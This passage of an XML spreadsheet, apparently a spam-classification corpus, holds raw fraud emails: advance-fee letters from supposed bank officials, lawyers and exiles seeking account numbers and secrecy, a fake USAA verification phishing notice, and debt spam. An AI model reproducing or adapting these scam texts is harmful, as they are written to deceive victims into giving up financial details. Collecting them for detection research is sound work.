exhibition will give you an opportunity to meet  all your  targetted visitors under a single  roof.Other exhibits will be from  various industries including high speed networking, internet telephony, mobile  and satellite communications, network infrastructure, optical access networking,  portable communication devices, t&amp;m and interactive media, VoIP, wireless  access, 3G, m-commerce, multimedia broadband services via satellite, conditional  access technologies, satellite receivers and transmitters, encoders, decoders,  and the latest in broadcast, cable and satellite equipment, mobile phone  accesories  etc.We  successfully concluded the 10th Convergence India 2002  exhibition and conference at New Delhi - the event had 176 exhibitors from  17 countries displaying their equipment and technologies to a discerning  audience of 16,093 visitors from the industry, government, related trade  associations. The event got extensive coverage from the media - both print  and electronic. The three day high profile conference had over 1374 delegates.  Highlights of the event were country pavilions from USA,  FRANCE, CHINA &amp; the VoIP  Technology Pavilion. More about the next  event:   Convergence India is certified by  the US Department of Commerce since 1994.   UK Group Participation :  Trade Fairs Support,UK Co-organisers:-  Ministry of Communications &amp; IT, Government of India- Association  of Basic Telecom Operators- Cellular Operators Association of India-  Indo-American Chamber of Commerce- VSAT Services Association of India-  Telecom Equipment Manufacturers Association of India (TEMA)- Internet  Service Providers Association of India (ISPAI Supports: All India Aavishkar Dish Antenna Sangh,  India, Cable Operators Federation of India, India, Economics, Finance &amp;  Trade Commission of France (UBI France), Electronic Component Industries  Association, India, Global VSAT Forum, UK, International Broadcasting  Convention (IBC), UK, National Association of Broadcasters (NAB),  USA, Swiss Multimedia Association, Switzerland, Telecom Users Group of  India, India, The Institution of Electronics and Telecommunication  Engineers, India   Participation  Cost: Shell Space:    US $  250 per sqm (minimum 9 sqm) Raw  Space:     US $ 220 per sqm (minimum 18  sqm)   Please visit our website ([URL]www.exhibitionsindia.o[/URL] rg) for further  details.    We await your  confirmation!!</t>
  </si>
  <si>
    <t>www.exhibitionsindia.o www.exhibitionsindia.o</t>
  </si>
  <si>
    <t>2569</t>
  </si>
  <si>
    <t>To: nan\nFrom: raji raji &lt;ria_26@hotmail.fr&gt;\nDate: Wed, 04 Oct 2006 13:11:51 +0200</t>
  </si>
  <si>
    <t>Wed, 04 Oct 2006 13:11:51 +0200</t>
  </si>
  <si>
    <t>raji raji &lt;ria_26@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">TREAT AS URGENT </t>
  </si>
  <si>
    <t>\n\nFROM THE DESK OF RAJI RAJI\nBILL AND EXCHANGE MANAGER,\nAFRICAN DEVELOPMENT BANK  (ADB)\nOUAGADOUGOU, BURKINA FASO.\n\n\nDear Friend,\n\nHow are you,first i will explain my self little to you\nbefore we continue. I am the manager of bill and\nexchange at the foreign remittance department of\nAFRICAN DEVELOPMENT BANK (ADB)I am writing to seek\nyour interest over a transaction.\n\nIn my department we discovered an abandoned sum of\n$15m US dollars (FIFTEEN MILLIONS US DOLLARS) . In an\naccount that belongs to one of our foreign customer\nwho died along with his entire family in November\n2001  in a plane crash. Since we got information about\nhis death, we have been expecting his next of kin to\ncome over and claim his money because we cannot\nrelease it unless somebody applies for it as next of\nkin or relation to the deceased as indicated in our\nbanking guidelines but unfortunately we learnt that\nall his supposed next of kin   or relation died\nalongside with him at the plane crash leaving nobody\nbehind for the claim.\n\nIt is therefore upon this discovery that I and one\nother official in my department have decided to make\nthis business proposal to you and release the money to\nyou as the next of kin or relation to the deceased for\nsafety and subsequent disbursement since nobody is\ncoming for it and we dont want this money to go into\nthe Bank's treasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if\nsuch money remained unclaimed after five years, the\nmoney will be transferred into the Bank's treasury as\nunclaimed fund. The request of  foreigner as next of\nkin in this business is occasioned by the fact that\nthe customer was a foreigner and a Burkinabe cannot\nstand as next of kin to a foreigner.\n\nWe agree that 40 % of this money will be for you as\nforeign partner, in respect to the provision of a\nforeign account,  10 % will be set aside for expenses\nincurred during the business and 50 % would be for me\nand my colleague. There after I will visit your\ncountry for disbursement of the fund according to the\npercentages indicated in this proposal. Therefore to\nenable the immediate transfer of this fund to you as\narranged, you must apply first to the bank as\nrelations or next of kin of the deceased indicating\nyour bank name, your bank account number, your private\ntelephone and fax number for easy and effective\ncommunication and location where in the money will be\nremitted.\n\nUpon receipt of your reply, I will send to you by\nemail the text of the application. I will not fail to\nbring to your notice that this transaction  is hitch\nfree and that you should not entertain any atom of\nfear as all required arrangements have been made for\nthe transfer .\n\nYou should contact me immediately as soon as you\nreceive this letter.\n\nTrusting to hear from you immediately.\n\n\nYours faithfully RAJI RAJI\nBill and Exchange Manager,\nAfrica Development Bank (A.D.B)\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>www.windowslivemessenger.fr</t>
  </si>
  <si>
    <t>227</t>
  </si>
  <si>
    <t>To: Recipients &lt;codewizard@approject.com&gt;\nFrom: "USAA" &lt;codewizard@approject.com&gt;\nDate: Wed, 04 May 2016 16:32:45 -0500</t>
  </si>
  <si>
    <t>Wed, 04 May 2016 16:32:45 -0500</t>
  </si>
  <si>
    <t>"USAA" &lt;codewizard@approject.com&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;codewizard@approject.com&gt;</t>
  </si>
  <si>
    <t>Your USAA Checking/Savings Account Verification Notice</t>
  </si>
  <si>
    <t>To ensure delivery to your inbox, please add  USAA.Web.Services@customermail.usaa.com to your address book.	  	        	     	      	      Account Verification Notice	       View Accounts |  Privacy Promise |  Contact Us	    	          	  	     	  	     	  	    	       USAA SECURITY ZONE   ONLINE    MEMBER    USAA # ending in: XXXX	    	      	     	     	    	    	     	    	          Dear Customer, For security reasons your online account has been temporarily restricted for verification, we are verifying and confirming our customers emails on our database to make sure their account has not been compromised and that they are still getting messages from usaa in order to prevent fraud and identity theft. Login here [URL]https://www.usaa.com[/URL] to complete your verification  Note: Some unpleasant mail providers put our messages into spam cause of swindlers phishing activity. Help us to improve your mail provider by clicking "Not Spam" on our message and use Mozilla Firefox browser for your safety. Thank you,  USAA   	  	         	    	  	  	     	  	  	  	     	      Please do not reply to this e-mail. To send a secure message to USAA, please  contact us.     Privacy Promise  USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288   	     	     	   USAA means United Services Automobile Association and its insurance, banking, investment and other companies. Banks Member FDIC. Investments provided by USAA Investment Management Company and USAA Financial Advisors Inc., both registered broker dealers.	  	     	      67624-1212      	    To      ensure delivery to your inbox, please add  USAA.Web.Services@customermail.usaa.com to your address book.     Account Verification Notice             View Accounts |                          Privacy Promise |                          Contact Us USAA SECURITY ZONE  ONLINE                 MEMBER                  USAA # ending in: XXXX           Dear Customer,         For security reasons your online account has been temporarily restricted for verification, we are  verifying and confirming our customers emails on our database to make sure their account has not been compromised and that they are still getting messages from usaa in  order to prevent fraud and identity theft. Login here [URL]https://www.usaa.com[/URL] to  complete your verification Note: Some unpleasant mail providers put our messages into spam cause of swindlers phishing activity. Help us to improve your mail provider by clicking "Not Spam" on our message and use Mozilla Firefox browser for your safety. Thank you,         USAA                                  Please do not reply to this e-mail. To send a secure message to USAA, please          contact us.     Privacy Promise     USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288               USAA means United Services Automobile Association and its insurance,      banking, investment and other companies. Banks Member FDIC. Investments      provided by USAA Investment Management Company and USAA Financial Advisors      Inc., both registered broker dealers.         67624-1212</t>
  </si>
  <si>
    <t>https://www.usaa.com https://www.usaa.com</t>
  </si>
  <si>
    <t>1291</t>
  </si>
  <si>
    <t>To: nan\nFrom: john_simon2005 &lt;john_simon2005@menanet.net&gt;\nDate: Wed, 04 May 2005 22:16:38 +0300</t>
  </si>
  <si>
    <t>Wed, 04 May 2005 22:16:38 +0300</t>
  </si>
  <si>
    <t>john_simon2005 &lt;john_simon2005@menanet.net&gt;</t>
  </si>
  <si>
    <t>FROM JOHN SIMON</t>
  </si>
  <si>
    <t>ASSYLUM CAMP ABIDJAN\nFROM JOHN SIMON\nAttn: President/CEO\n\n\n                                       CONFIDENTIAL\n\nDear One,\n\nI am JOHN SIMON the only son of late former Director of \nfinance,Chief Vincent SIMON\nSierra-Leone diamond and mining corporation. I must \nconfess my agitation is real, and my words is\nmy bond, in this proposal. My late father diverted this \nmoney meant for purchase of\nammunition, for my country, during the peak of disastrous \ncivil war in my country, now he has\ndeposited the money with one of the BANK in Abidjan, where \ni am residing under political asylum with my mother Mrs \nMONEYKA SIMON and younger sister.\n\n\nNow the war in my country is over with the help of ECOMOG \nsoldiers, the present government of Sierra Leone has \nrevoked the passport of all officers who served under the \nformer regime and now ask countries to expel such person \nat the same time freeze their account and confiscate their \nasset, it is on this note that I am contacting you, all I \nneeded from you is to furnish me with your bank \nparticulars:\n\n1) Account name\n2) Account number \n3) Bank address, telephone and fax number For you to \nassist me transfer this money in your\nprivate bank account, the said amount is (Twenty seven \nMillion Dollars) $27 Million.\n\nI am compensating you with 15 % of the total money amount, \nnow all my hope is banked on you and I really wants to \ninvest this money in your country, were their is stability \nof Government, political and economic welfare. Honestly I \nwant you to believe that this transaction\nis real and never a joke. My late father Chief SIMON\n\ngave me the certificate of deposit issued to him by BANK \non the date of deposit, for\nyou to be clarify because, I do not expose my self to \nanybody I see, I believe that you are able to keep this \ntransaction secret for me because this money is the hope \nof my life, it is important. Please call me immediately \nafter you must have gone through my message fill free and \nmake it urgent. That is the reason why I offered you 15 % \nof the total money amount, and in case of any other \nnecessary expenses you might incur during this \ntransaction. N.B Try and negotiate for me some profitable \nblue chip investment opportunities which is risky free \nwhich I\ncan invest with this money when it is transferred to your \naccount, personally I am interested in estate management \nand hotel business, please advise me.\n\n\nCall me back immediately you receive this message for more \nexplanation.And promisse me my younger sister and our \nmother to be a father considering our situation\nand not to betray us.\n\n\nNB: my late father used me the only son as the\n\nbeneficiary / next of kin on the day of deposit and also \ntold me I need a foreign assistance of a\nforeigner with a legitimate bank Account abroad who will \nstand as co-beneficiary and partner abroad.\n\n\nThanks and God bless\n\nBest regards\nJOHN SIMON\n\nplease i will like you to contact me trough this mail for\nmore confidential (john_simon222003@yahoo.fr )  \n\n\n\n___________________________________________________________________________\nYour email is totally virus secure by MenaNet AntiVirus.\nTired of spam? Get advanced, send spam emails to MenaNet.AntiSpam@menanet.net to be protected by MenaNet AntiSpam.\n[URL]http://www.menanet.net[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.menanet.net</t>
  </si>
  <si>
    <t>1289</t>
  </si>
  <si>
    <t>To: nan\nFrom: MR. KIMAEVA LIOUDMILA &lt;kimlio233@web-mail.com.ar&gt;\nDate: Wed, 04 May 2005 15:04:24 +0200</t>
  </si>
  <si>
    <t>Wed, 04 May 2005 15:04:24 +0200</t>
  </si>
  <si>
    <t>MR. KIMAEVA LIOUDMILA &lt;kimlio233@web-mail.com.ar&gt;</t>
  </si>
  <si>
    <t>Get in touch</t>
  </si>
  <si>
    <t>\nDear Friend,\n\nI have a profiling amount in an excess of US$18.2M,\nwhich I seek your partnership in accommodating for me.\nYou will be rewarded with 40% of the total sum for\nyour partnership. Can you be my partner on this?\n\nINTRODUCTION OF MY SELF:\n\nI am MR. KIMAEVA LIOUDMILA, a personal secretary to\nMikhail Khodorkovsky one of the richest man in Russia\nand\nowner of the following companies: Chairman CEO: YUKOS\nOIL (Russian Most Largest Oil Company) Chairman CEO:\nMenatep SBP Bank (A well reputable financial\ninstitution with its branches all over the world).\n\nSOURCE OF FUNDS:\n\nThe money in question was realised during my period of\nwork with my boss for a peroid spanning 20 years.\nAlready the funds have been deposited some where in\nthe UK (undisclosed for now), where the final \ncrediting is expected to be carried out. While I was\non the process, My Boss got arrested for his\ninvolvement on politics in financing the\nleading and opposing political parties (the Union of\nRight Forces, led by Boris Nemtsov, and Yabloko, a\nliberal/social democratic party led by Gregor\nYavlinsky) which poses treat to President Vladimir\nPuttin second tenure as Russian president. You can\ncatch more of the story on this\n[URL]http://newsfromrussia.com[/URL]\n\nYOUR ROLE:\n\nAll I need from you is to stand as the beneficiary of\nthe above quoted sum and I will arrange for the\ndocumentation which will enable transfer of the sum to\nyou. I have decided to use this sum to relocate to\nAmerican continent and never to be connected to any of\nMikhail Khodorkovsky conglomerates. You can read more\nabout my boss from the following link\n[URL]http://mikhail-khodorkovsky-news.newslib.com[/URL]\n\nAs soon as I get your willingness to comply through my\nmost private email address kimlio233@web-mail.com.ar\nwill give you more details.\n\nThank you very much\n\nRegards:\nMR. KIMAEVA LIOUDMILA.\n\n\n___________________________________________________________________________\nWebMail service @ [URL]http://www.pullings.de[/URL] &amp; [URL]http://www.pullingworld.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://newsfromrussia.com http://mikhail-khodorkovsky-news.newslib.com http://www.pullings.de http://www.pullingworld.com</t>
  </si>
  <si>
    <t>1288</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr Sam White &lt;sr_whit_1mans@ozu.es&gt;\nDate: Wed, 04 May 2005 00:49:04 +0200</t>
  </si>
  <si>
    <t>Wed, 04 May 2005 00:49:04 +0200</t>
  </si>
  <si>
    <t>Mr Sam White &lt;sr_whit_1mans@ozu.es&gt;</t>
  </si>
  <si>
    <t>#20 Louis Botha Avenue,\nJohannesburg.South Africa.\nTel: +874763591545\nFax: +874763591546\n\n     (URGENT TRANSFER)\n\n        Good Day My Dear,\n\nWe want to transfer to overseas the sum of One hundred and Forfty Two\nMillion United States Dollars (U.S.$142,000,000.00) from a in Africa.\n\nI want to ask you to kindly look for a reliable and honest person who will\nbe capable and fit to provide either an existing bank account or to set up\na new bank account immediately to receive this  oney,though an empty bank\naccount could serve this purpose as long as you will remain honest to me\ntill the end of this important business trusting in you and believing in\nGod that you will never let me down either now or in time to come.\n\nI am Mr.Sam White ,the external auditor of a Bank.During the course of our\nauditing,I discovered a floating fund in an account opened in the bank in\n1990 and since 1993 nobody has operated on this account again.After going\nthrough some old files in the records, I discovered that the owner of the\naccount died without a Heir apparent to the throne hence the money is\nfloating and if I do not remit this money out urgently it will be\nforfeited for nothing.\n\nThe owner of this account who is Mr.Eshed.B.Willey,a foreigner and an\nindustrialist died, since 1990,until now no other person(s) knows about\nthis account or could give any documentary evidence concerning this\naccount. As such this account has no other beneficiary and my\ninvestigation proved to me as well that Eshed.B.Willey until his death was\nthe manager Oriental Diamond Company,in South Africa. However, if you are\ninterested in this business we will start the first money transfer with\nForfty Two Million\nU.S.Dollars (U.S.$42,000,000.00) upon successful transaction without any\ndisappointment from you. We shall also re-apply for the payment of the\nremaining amount to your account.\n\nWhile the total amount involved is One hundred and Forfty Two Million\nUnited States Dollars (U.S.$142000,000.00)only. I would want us to make a\nfirst transfer of Forfty Two Million United States\nDollar.(U.S.$4200,000.00)from this money into a safe foreigners account\nabroad before the rest. I am only contacting you as a foreigner because\nthis money can not be approved to a local account, without valid\ninternational foreign Agreement, but could only be approved to any\nforeigner with valid international credentials: passport or drivers\nlicense and foreign account because this sum is in U.S. dollars and the\nformer owner of the account Mr.Eshed.B.Willey is a foreigner too, thus the\nmoney could only be approved into a foreign account. However, knowing all\nthis, we will reach a binding agreement in this regards.As a matter of\nurgency, I will inform you the next step to take, while you Send your\nprivate telephone and fax number including the full details of the account\nto be used for the deposit.I want us to meet face to face to build\nconfidence and to sign a binding agreement that will\nbind us together before transferring the money to any account of your\nchoice where the fund will be safe.sharing and investments.\n\nI need your full co-operation to make this business a success, because the\nmanagement is ready to approve this payment to any foreigner who has\ncorrect information of this account,which I will give to you,upon your\npositive response and once I am convinced that you are capable and will\nmeet up with the instructions of a key bank official who is deeply\ninvolved with me in this business. I need your strong assurance that you\nwill never let me down. I would like you to send me your information as\nstated below:\n\n(1) Your Private: Tele&amp; Fax Number :\n\n(2) Bank Name:\n\n(3) Bank Address:\n\n(4) Account Number:\n\n(5) Account Name:\n\n(6) Swift Code / Routing Number if any:\n\nWith my influence and the position in the bank we can transfer this money\nto any foreigner's reliable account which you can provide with assurance\nthat this money will be intact pending our physical arrival in your\ncountry for sharing. And to build confidence that you can come immediately\nto discuss with me face to face after which I will make this remittance in\nyour presence and three of us will fly to your country at least two days\nahead of the money going into the account.\n\nI will apply for annual leave to get visa immediately I hear from you that\nyou are ready to act as directed. To prove the authenticity of the\nbusiness I will use my position and influence to obtain all legal\napprovals for onward transfer of this money to your account with\nappropriate clearance from the relevant ministries,foreign exchange\ndepartments, embassy and Board of Internal Revenue services. At the\nconclusion of this business, you will be given 35% of the total amount,\n60% will be for me,while 5% will be for expenses both parties might have\nincurred during this process.\n\nI look forward to your earliest reply.\n\nRegards and God Bless,\n\nMr White.\n\n\n\n\n\n\n\n\n\n\n--------------------------------------------------------------------------------------------\nNueva Barra de Herramientas de OZÚ. Navega Más facilmente por Internet.\n¡Descargatela gratis! [URL]http://barra.ozu.es[/URL]\n--------------------------------------------------------------------------------------------\nCorreo enviado desde [URL]http://www.ozu.es[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://barra.ozu.es http://www.ozu.es</t>
  </si>
  <si>
    <t>ESP</t>
  </si>
  <si>
    <t>3180</t>
  </si>
  <si>
    <t>To: nan\nFrom: john alison &lt;johnali20@hotmail.com&gt;\nDate: Wed, 04 Jul 2007 08:06:56 -0400</t>
  </si>
  <si>
    <t>Wed, 04 Jul 2007 08:06:56 -0400</t>
  </si>
  <si>
    <t>john alison &lt;johnali20@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM:MR JOHN ALISON.</t>
  </si>
  <si>
    <t>\n&gt; CONFIDENTIAL&gt; &gt; I KNOW THIS WILL COME TO YOU AS A SURPRISE BECAUSE&gt; YOU DO NOT KNOW ME . I AM JOHN ALISON, I WORK IN THE&gt; CENTRAL BANK OF NIGERIA, PACKAGING AND COURIER&gt; DEPARTMENT. I GOT YOUR CONTACT IN MY SEARCH FOR A&gt; HONEST PERSON THROUGH ONE OF MY COLLEAGUES HERE IN THE CENTRAL BANK&gt; WHO&gt; SAID THAT I CAN CONFIDE IN YOU.&gt; &gt; I WANT YOU TO HELP ME CLEAR THIS PACKAGE THAT IS&gt; ALREADY IN EUROPE WHICH I SHIPPED THROUGH OUR CBN&gt; ACCREDITED COURIER AGENT BUT THE CONTENTS OF THE&gt; PACKAGE IS $20,000,000.00 ALL IN $100.00 BILLS, BUT&gt; THE COURIER COMPANY DOES NOT KNOW THAT IT IS MONEY&gt; THAT I HAVE IN THE PACKAGE.&gt; &gt; ALL I WANT YOU TO DO FOR ME NOW IS THIS GIVE ME YOUR&gt; MAILING ADDRESS, YOUR PRIVATE PHONE AND FAX, AND I&gt; HOPE THAT AT THE END OF THE DAY, YOU WILL HAVE 30%&gt; AND 70% WILL BE FOR ME . MY IDENTITY MUST NOT BE&gt; REVEALED TO ANYBODY. IF THIS ARRANGEMENT IS OKAY BY&gt; YOU.&gt; &gt; YOU CAN CALL E-MAIL ME FOR SECURITY REASONS OTHER&gt; MODALITIES WILL BE DISCUSSED AS SOON AS YOU GET BACK&gt; TO ME INCLUDING SENDING OF THE KEYS TO THE BOXES TO YOU.&gt; &gt; YOURS FAITHFULLY,&gt; &gt; MR. JOHN ALISON\n_________________________________________________________________\nMissed the show?  Watch videos of the Live Earth Concert on MSN.\n[URL]http://liveearth.msn.com[/URL]</t>
  </si>
  <si>
    <t>4618</t>
  </si>
  <si>
    <t>To: &lt;hot1@ireland.com&gt;\nFrom: hot1@ireland.com\nDate: Wed, 04 Jul 2001 21:30:11 -0600</t>
  </si>
  <si>
    <t>Wed, 04 Jul 2001 21:30:11 -0600</t>
  </si>
  <si>
    <t>hot1@ireland.com</t>
  </si>
  <si>
    <t>&lt;hot1@ireland.com&gt;</t>
  </si>
  <si>
    <t>Get Out of Debt Fast                         29521</t>
  </si>
  <si>
    <t>More Than $2500 in DEBT?\n\nWe Can Help You PAY-OFF Your BILLS!!\nClick here for your FREE Consultation!!\n[URL]http://www.cash-refund.com[/URL]\n\n~Cut your monthly payments by 50% or even more...\n~Stop paying Creditors high interest rates?\n~Better Manage your Financial Situation...Keep More Cash every Month!\n~We can Help STOP any Creditor Harassment!\n~Consolidate Regardless of past Credit History!\n\nQuick - Confidential - No Obligations -\nClick on the link below to get started!!\n[URL]http://www.cash-refund.com[/URL]\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nIf this message has reached you in error and you wish to be removed from our\nmailing list please click this link:\nmailto:debtgone@btamail.net.cn?subject=Remove</t>
  </si>
  <si>
    <t>http://www.cash-refund.com http://www.cash-refund.com</t>
  </si>
  <si>
    <t>1664</t>
  </si>
  <si>
    <t>To: nan\nFrom: james kone &lt;konechambers202@msn.com&gt;\nDate: Wed, 04 Jan 2006 19:26:13 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Jan 2006 19:26:13 +0000</t>
  </si>
  <si>
    <t>james kone &lt;konechambers202@msn.com&gt;</t>
  </si>
  <si>
    <t>GOOD DAY</t>
  </si>
  <si>
    <t>Kone Law Firm\n6, Kofo Abayomi Street\nVictoria Island\nLagos\nNigeria\n[URL]www.konelawfirm.com[/URL]\nEmail.konechambers40@yahoo.ca\n\nDear Friend,\n\n\nRE: WILL EXECUTOR\n\nI am sure that this letter  will come to you as a surprise, but I shall be \ngrateful if you would read with the interest of assisting in this proposal \ntendered herein.\nMy name is Barrister Williams  kone, Attorney at Law and Legal advisor to Mr \nPhelps M. Dasne, A foreigner who used to work with Mekon Associates Company \nin Nigeria.Here after referred to as my Client.\n\nAt about 1.35pm on May 4 2002, my Client, his Wife and their three children \nwere involved in an Air Crash, when the Nigerian Passenger Plane they \nboarded, crashed into a densely populated suburb of the city of Kano in \nnorthern Nigeria, killing at least 148 people on board including my Client, \nhis entire family and the Former Minister of Sport in Nigeria,Late Ishaya \nMark Aku.\n\nFor more sunstantiation about the aformentioned incident; please browse\nthrough the underlisted Web Addresses and read for yourself:\n\n[URL]http://www.dawodu.com[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n\nSubsequently, since then, I have made several inquires to your Embassy to \nlocate any of my Late Client's Extended Relatives, which has also proved \nunsuccessful.\nAfter these several unsuccessful attempts to locate any member of his \nfamily, hence,i contacted you assist me to repatriate the money and property \nleft behind by my Late Client before they get confiscated in the Bank \nTreasury or declared unserviceable by the Finance House where this huge \ndeposit were lodged, so that the proceeds of this Account valued at 3.5 \nMillion Dollars ($3.5MUSD) can be paid to your Account.\n\nThe Finance House where the Deceased had an Account valued at about 3.5 \nMillion Dollars ($3.5MUSD) has issued me a notice to provide the Next Of Kin \nor have the Account dormant &amp; confiscated for inactiveness within the next \n21 banking days.\n\nPragmatically, I have all the necessary legal documents that can be used to \nback up any claim we may make anywhere. All I require is your honest \ncooperation to enable us see this transaction through.\n\nI guarantee that this will be executed under a legitimate arrangement\nthat will protect you from any Breach of the Law.\nInfact, all you are to do is to send the below\ninformation to me,to enable me forward your name to the Finance House as the \nnext of kin to my late client.\n\n{1}. YOUR FULL NAME.\n\n{2}. YOUR CONTACT ADDRESS.\n\n(3)DIRECT TELEPHONE NUMBER\n\nI am willing to share this money with you at the proportion of 30% to \nyou,while 10% for any cost being incured during this transaction, and the \nbalance 60% which is for me will be kept under your supervision immediately \nthe money is transferred into your account for safe keeping.\n\nAll I require is your honest co-operation to enable us see this transaction \nthrough.\n\nI guarantee that this will be executed under a legitimate arrangement that \nwill protect you from any breach of the law. Please get in touch with me by \nmy secured and confidential e-mail:\nkonechambers40@yahoo.ca\ndiscuss further.\n\nFor more sunstantiation about the aformentioned incident; please browse\nthrough the underlisted Web Addresses and read for yourself:\n\n[[URL]http://www.ngex.com[/URL]]\n[[URL]http://news.bbc.co.uk[/URL]]\n[[URL]http://www.dawodu.com[/URL]].\n\nI await your favorable response\n\nYours faithfully,\n\nBarrister: Barrister Williams  kone.\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.konelawfirm.com http://www.dawodu.com http://news.bbc.co.uk http://www.ngex.com http://news.bbc.co.uk http://www.dawodu.com</t>
  </si>
  <si>
    <t>1663</t>
  </si>
  <si>
    <t>To: nan\nFrom: PAUL SPENCER &lt;paulspencer@virgilio.it&gt;\nDate: Wed, 04 Jan 2006 17:22:36 +0100</t>
  </si>
  <si>
    <t>Wed, 04 Jan 2006 17:22:36 +0100</t>
  </si>
  <si>
    <t>PAUL SPENCER &lt;paulspencer@virgilio.it&gt;</t>
  </si>
  <si>
    <t>\n\n\nHello,\n\nI wish to accost you with a request that would be of immense \nbenefit to both of us. Being an executor of wills, it is possible that \nwe may be tempted to make fortune out of our client's situations, when \nwe cannot help it, or left with no better option. The issue I am \npresenting to you is a case of my client who willed a fortune to his \nnext-of-kin. It was most unfortunate that he and his next-of-kin died \non the same day the 31st October 1999 in an Egyptian airline 990 with \nother passengers on board. You can confirm this from the website below \nwhich was published by BBC WORLD NEWS.\n\n WEBSITE.\n[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/americas/502503.stm\n \nI am now faced with confusion of \nwho to pass the fortune to.\nAccording to the English law, the fortune \nis supposed to be bequeathed to the government,if nobody comes forward \nas the next of kin within ten years of the demise of the benefactor of \nthe will. My purpose of contacting you is to seek your acting as the \nbeneficiary of the will, and lay claim to the legacy of $7million, \nwhich my deceased client  bequeathed to his next-of-kin. For now, I \nalone know about his will, as my client had great confidence in me.\n\nEverything will be left between you and I. The share would be 25% for \nyou and 75% for me. I would want to give a huge part of my share to the \ntsunami victims,\nas this is my primary objective. All I have to do is \namend the will or add a codicil to make you the beneficiary to the \n$7million legacy.\n\nAgain, I feel that you may apprehensive and consider \nthis amount too big for you to defend. It does not matter, as there are \ndocuments to back it up. \nThis is a legacy being passed on to a next-of-\nkin. As I am not very sure of getting your consent on the issue I \nprefer not to divulge my full identity so as not to risk being \ndisbarred. The English Bar considers it a breach of the oath of the \nEnglish Bar. I need not emphasize to you that the sensitivity of this \nissue need not be toyed with by neglecting its confidentiality. I \ntherefore appeal to you not discuss this request with anybody, even if \nyou decline my request.\n\nI look forward to hearing from you soon.\n\nYours truly\n\nPaul Spencer. \n \n \n \n \n\n\n</t>
  </si>
  <si>
    <t>5808</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "wilsonkamela400@netscape.net" &lt;wilsonkamela500@netscape.net&gt;\nDate: Wed, 04 Dec 2002 06:07:07</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 06:07:07</t>
  </si>
  <si>
    <t>"wilsonkamela400@netscape.net" &lt;wilsonkamela500@netscape.net&gt;</t>
  </si>
  <si>
    <t>[ILUG] WILSON  KAMELA</t>
  </si>
  <si>
    <t>ATTN:SIR/MADAN      \n\n                      STRICTLY CONFIDENTIAL.\n\nI am pleased to introduce myself  to you.My name is Mr. Wilson Kamela a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.\n\nI  am writing this letter to request your assistance in order to redeem an investment with the South African mining Corporation.The said investment, now valued at  ($15.5 million dollars ) Fifteen  million,five hundred thousand dollars only was purchased by Lucio Harper and contracted out to the South  African Mining Corporation in 1977 now recognised as mines and natural resources department.This redeemable investment interest,has now matured since March last year.\n\nSince MARCH last year, several attempts have been made to contact Lucio Harper without success and there is no way to contact any of his close relatives in whose favour the investment cash value can be paid.                                                    \n                                   \nSince we have access to all Lucio Harper's information,we can claim this money with the help of my partners with the South African Mines and natural resources department.All we have to do is to file claim using you as Lucio Harper's relative.\n\nI will like to assure you that there is absolutely nothing to worry about,because it is perfectly safe with no risk involved.Please ensure to keep this matter strictly confidential.My partner will file a claim for this money on your behalf from the SouthAfrican mining Corporation.When the claim is approved,you as the beneficiary \nwill be paid (25%) of the total amouth.\n\nSince this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.\n\nI will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  wilsonkamela3000@mail.com .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications \nrelating to the transaction will be explained to you.\n\n\nTruly yours,\nWilson Kamela.\n\n\n\n \n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>3012</t>
  </si>
  <si>
    <t>To: nan\nFrom: usman karim &lt;usman_karim0015@hotmail.com&gt;\nDate: Wed, 04 Apr 2007 20:04:46 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Apr 2007 20:04:46 +0000</t>
  </si>
  <si>
    <t>usman karim &lt;usman_karim0015@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR USMAN  KARIM</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR USMAN  KARIM\nManager Bill And Exchange Dept\nBANK OF AFRICA(BOA)\nOuagadougou Burkina Faso.\n\nDear Friend,\n\nI know that this mail will come to you as a  surprise. I am the bill and \nexchange manager in BANK OF AFRICAk .I Hoped that you  will not expose or  \nbetray this trust and confident that i am about to repose on you for the \nmutual benefit of our both families.\n\nI need your urgent assistance in transferring the  sum of $11.3 million \nimmediately to your account. The money has been  dormant for years in our \nBank  here without any body coming for it. The owner of this account is \nJOSEPH F. GRILLO, foreigner and he is the Manager Of petrol chemical \nservice, a chemical engineer by Profession. He died in world trade center as \na victim of the September 11,2001 Incident that befall the United State of \nAmerica, the bank has made series of efforts to contact any of the relatives \nto claim this money but without success, you can confirm through this \nwebsite:\n\n[URL]http://www.september11victims.com[/URL]\n\nI don't want the money to go into our Bank treasury  as an abandoned  fund. \nSo this is the reason why i contacted you ,so that  the bank  can  release \nthe  money to you as the nearest person to the deceased  customer. Please i \nwill like you to keep this proposal as a top secret and  delete if you are \nnot interested.\n\nUpon receipt of your reply I will send you full  details on how the business \n  will be executed and also note that you will have  40% of the above \nmentioned  